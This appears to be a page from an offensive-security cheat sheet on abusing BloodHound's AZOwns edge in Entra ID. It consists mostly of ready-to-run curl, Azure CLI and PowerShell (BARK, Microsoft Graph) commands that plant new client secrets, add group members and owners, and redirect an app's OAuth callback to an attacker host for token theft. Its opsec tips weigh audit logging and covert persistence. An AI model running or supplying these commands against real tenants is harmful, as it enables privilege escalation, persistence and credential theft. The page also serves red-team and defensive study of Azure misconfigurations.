🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / AZOwns

AZOwns

The source principal is the owner of the target Entra ID object, granting nearly all abuse primitives against it.

Applies to: User / ServicePrincipal β†’ AZGroup / AZServicePrincipal / AZDevice / AZApplication

Linux Abuse

Add secret to owned App Registration (curl)

TOKEN=$(curl -s -X POST \
  "https://login.microsoftonline.com/<tenant-id>/oauth2/v2.0/token" \
  -d "client_id=<app-id>&client_secret=<secret>&scope=https://graph.microsoft.com/.default&grant_type=client_credentials" \
  | jq -r '.access_token')

# Add client secret to owned app
curl -s -X POST "https://graph.microsoft.com/v1.0/applications/<object-id>/addPassword" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"passwordCredential": {"displayName": "backup"}}'

Add member to owned group (curl)

curl -s -X POST "https://graph.microsoft.com/v1.0/groups/<target-group-id>/members/\$ref" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<object-id>\"}"

Azure CLI β€” add member to owned group

az login --service-principal -u <app-id> -p '<secret>' --tenant <tenant-id>
az ad group member add --group <target-group-id> --member-id <object-id>

Windows Abuse

Add secret to owned Service Principal (BARK)

$Token = Get-MSGraphTokenWithClientCredentials `
  -ClientID "<app-id>" -ClientSecret "<secret>" -TenantName "<tenant-id>"

New-EntraAppSecret `
  -AppRegObjectID "<object-id>" `
  -Token $Token.access_token

Add owner to owned SP (BARK)

New-ServicePrincipalOwner `
  -ServicePrincipalObjectId "<object-id>" `
  -NewOwnerObjectId "<object-id>" `
  -Token $Token.access_token

Add member to owned group (Microsoft.Graph PS)

Connect-MgGraph -AccessToken <access-token>
New-MgGroupMember -GroupId <target-group-id> -DirectoryObjectId <object-id>

Add owner to owned group

New-MgGroupOwner -GroupId <target-group-id> -DirectoryObjectId <object-id>

Update owned app redirect URIs (for OAuth token theft)

Update-MgApplication -ApplicationId <object-id> `
  -Web @{RedirectUris = @("https://attacker.com/callback")}

Opsec

  • Ownership grants near-arbitrary control; Azure logs each abuse action separately.
  • Adding secrets to apps leaves an audit event: "Update application - Certificates and secrets management."
  • Group membership changes log actor, target group, and added principal with timestamp.
  • Prefer adding a new secret over modifying existing credentials to avoid breaking the app.